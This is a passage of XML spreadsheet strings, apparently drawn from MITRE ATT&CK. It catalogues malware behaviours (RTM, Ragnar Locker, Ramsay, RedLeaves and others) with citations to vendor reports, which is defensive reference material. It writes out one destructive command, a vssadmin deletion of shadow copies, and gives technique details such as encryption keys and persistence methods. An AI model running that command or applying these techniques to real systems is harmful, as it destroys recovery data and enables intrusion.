    <t>[RTM](https://attack.mitre.org/software/S0148) can use the &lt;code&gt;FindNextUrlCacheEntryA&lt;/code&gt; and &lt;code&gt;FindFirstUrlCacheEntryA&lt;/code&gt; functions to search for specific strings within browser history.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) used Port 44443 for its VNC module.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. [RTM](https://attack.mitre.org/software/S0148) has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain information about process integrity levels.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) tries to add a Registry Run key under the name "Windows Update" to establish persistence.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has the capability to download a VNC module from command and control (C2).(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) tries to add a scheduled task to establish persistence.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain information about security software on the victim.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has been delivered via spearphishing attachments disguised as PDF documents.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) encrypts C2 traffic with a custom RC4 variant.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the computer name, OS version, and default language identifier.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the victim username and permissions.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the victim time zone.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[RTM](https://attack.mitre.org/software/S0148) can detect if it is running within a sandbox or other virtualized analysis environment.(Citation: Unit42 Redaman January 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RTM](https://attack.mitre.org/software/S0148) has initiated connections to external domains using HTTPS.(Citation: Unit42 Redaman January 2019)	</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) uses the command line and rundll32.exe to execute.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to terminate/stop processes and services associated with endpoint security products.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) can delete volume shadow copies using &lt;code&gt;vssadmin delete shadows /all /quiet&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has been delivered as an unsigned MSI package that was executed with &lt;code&gt;msiexec.exe&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) may attempt to connect to removable drives and mapped network drives.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used regsvr32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables [Ragnar Locker](https://attack.mitre.org/software/S0481) to encrypt files on the host operating system, including files on any mapped drives.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used rundll32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to execute a service that it creates.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>Before executing malicious code, [Ragnar Locker](https://attack.mitre.org/software/S0481) checks the Windows API &lt;code&gt;GetLocaleInfoW&lt;/code&gt; and doesn't encrypt files if it finds a former Soviet country.(Citation: FBI Ragnar Locker 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used cmd.exe and batch scripts to execute commands.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to create a new service for the VirtualBox driver.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) decrypted its [Cobalt Strike](https://attack.mitre.org/software/S0154) payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) was installed under names that resembled legitimate Windows file and directory names.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) encrypted its payload using a simple XOR algorithm with a single-byte key.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) used a custom packer for its [Cobalt Strike](https://attack.mitre.org/software/S0154) payload, which was compressed using the LZMA algorithm.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) used steganography to locate the start of its encoded payload within legitimate 7-Zip code.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>After initial installation, [Raindrop](https://attack.mitre.org/software/S0565) runs a computation to delay execution.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use tools to collect credentials from web browsers.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use side-loading to run malicious executables.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to collect recently changed files on a compromised host.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can decrypt its payload via a XOR key.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to upload specific files to Dropbox.(Citation: Bitdefender Naikon April 2021)	 
</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has the ability to switch between TCP and HTTP for C2 if one method is not working.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has the ability to uninstall itself by deleting its service and files.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to collect recently changed files with specific extensions.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can download files to a compromised host.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to copy files to &lt;code&gt;C:\ProgramData\Adobe\temp&lt;/code&gt; prior to exfiltration.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has named services and scheduled tasks to appear benign including "ChromeCheck" and "googleupdate."(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has used names to mimic legitimate software including "vmtoolsd.exe" to spoof Vmtools.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>The file collection tool used by [RainyDay](https://attack.mitre.org/software/S0629) can utilize native API including &lt;code&gt;ReadDirectoryChangeW&lt;/code&gt; for folder monitoring.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use TCP in C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has downloaded as a XOR-encrypted payload.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can enumerate processes on a target system.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use proxy tools including boost_proxy_client for reverse proxy functionality.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use scheduled tasks to achieve persistence.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has the ability to capture screenshots.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use RC4 to encrypt C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can create and register a service for execution.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use HTTP in C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use the Windows Command Shell for execution.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use services to establish persistence.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can insert itself into the address space of other applications using the AppInit DLL Registry key.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can compress and archive collected files using WinRAR.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can use [UACMe](https://attack.mitre.org/software/S0116) for privilege escalation.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use the Windows COM API to schedule tasks and maintain persistence.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can collect Microsoft Word documents from the target's file system, as well as &lt;code&gt;.txt&lt;/code&gt;, &lt;code&gt;.doc&lt;/code&gt;, and &lt;code&gt;.xls&lt;/code&gt; files from the Internet Explorer cache.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can collect data from network drives and stage it for exfiltration.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can collect data from removable media and stage it for exfiltration.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can extract its agent from the body of a malicious document.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has been delivered using OLE objects in malicious documents.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;ImprovedReflectiveDLLInjection&lt;/code&gt; to deploy components.(Citation: Eset Ramsay May 2020) </t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can collect directory and file lists.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can stage data prior to exfiltration in &lt;code&gt;%APPDATA%\Microsoft\UserSetting&lt;/code&gt; and &lt;code&gt;%APPDATA%\Microsoft\UserSetting\MediaCache&lt;/code&gt;.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been executed through malicious e-mail attachments.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a JPG image file.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a 7zip installer.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use Windows API functions such as &lt;code&gt;WriteFile&lt;/code&gt;, &lt;code&gt;CloseHandle&lt;/code&gt;, and &lt;code&gt;GetCurrentHwProfile&lt;/code&gt; during its collection and file storage operations. [Ramsay](https://attack.mitre.org/software/S0458) can execute its embedded components via &lt;code&gt;CreateProcessA&lt;/code&gt; and &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can scan for systems that are vulnerable to the EternalBlue exploit.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can scan for network drives which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has base64-encoded its portable executable and hidden itself under a JPG header. [Ramsay](https://attack.mitre.org/software/S0458) can also embed information within document footers.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can scan for removable media which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can gather a list of running processes by using [Tasklist](https://attack.mitre.org/software/S0057).(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has created Registry Run keys to establish persistence.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on removable drives.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can schedule tasks via the Windows COM API to maintain persistence.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can take screenshots every 30 seconds as well as when an external removable storage device is connected.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been distributed through spearphishing emails with malicious attachments.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has used base64 to encode its C2 traffic.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has PE data embedded within JPEG files contained within Word documents.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use [ipconfig](https://attack.mitre.org/software/S0100) and [Arp](https://attack.mitre.org/software/S0099) to collect network configuration information, including routing information and ARP tables.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;netstat&lt;/code&gt; to enumerate network connections.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on networks shared drives.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has included embedded Visual Basic scripts in malicious documents.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has used HTTP for C2.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to help overwrite components of disk structure like the MBR and disk partitions.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) encodes credit card data it collected from the victim with XOR.(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)(Citation: Visa RawPOS March 2015)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>Data captured by [RawPOS](https://attack.mitre.org/software/S0169) is placed in a temporary file under a directory named "memdump".(Citation: Kroll RawPOS Jan 2017)</t>
  </si>
  <si>
    <t>New services created by [RawPOS](https://attack.mitre.org/software/S0169) are made to appear like legitimate Windows services, with names such as "Windows Management Help Service", "Microsoft Support", and "Windows Advanced Task Manager".(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) installs itself as a service to maintain persistence.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can compress files using `gzip` prior to exfiltration.(Citation: Rclone)</t>
  </si>
  <si>
    <t>The [Rclone](https://attack.mitre.org/software/S1040) "chunker" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.(Citation: Rclone)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data over SFTP or HTTPS via WebDAV.(Citation: Rclone)</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data over FTP or HTTP, including HTTP via WebDAV.(Citation: Rclone)</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.(Citation: Rclone)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can list files and directories with the `ls`, `lsd`, and `lsl` commands.(Citation: Rclone)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) encrypts collected data with an incremental XOR key prior to exfiltration.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) drops and executes a malicious CPL file as its payload.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) deletes the original dropped file from the victim.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>Some [Reaver](https://attack.mitre.org/software/S0172) variants use raw TCP for C2.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) encrypts some of its files with XOR.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) queries the Registry to determine the correct Startup path to use for persistence.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) creates a shortcut file and saves it in a Startup folder to establish persistence.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects the victim's IP address.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects the victim's username.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>Some [Reaver](https://attack.mitre.org/software/S0172) variants use HTTP for C2.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) installs itself as a new service.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can gather browser usernames and passwords.(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is launched through use of DLL search order hijacking to load a malicious dll.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can delete specified files.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate and search for files and directories.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is capable of downloading a file from a specified URL.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can use HTTP over non-standard ports, such as 995, for C2.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>A [RedLeaves](https://attack.mitre.org/software/S0153) configuration file is encrypted with a simple XOR key, 0x53.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can capture screenshots.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about network parameters.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate drives and Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about the logged on user both locally and for Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can communicate to its C2 over HTTP and HTTPS if directed.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can receive and execute commands with cmd.exe. It can also provide a reverse shell.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to find credentials in the Windows Registry.(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can use Dropbox as its C2 server.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can decrypt strings with a key either stored in the Registry or hardcoded in the code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can download files from C2.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can store its encryption key in the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
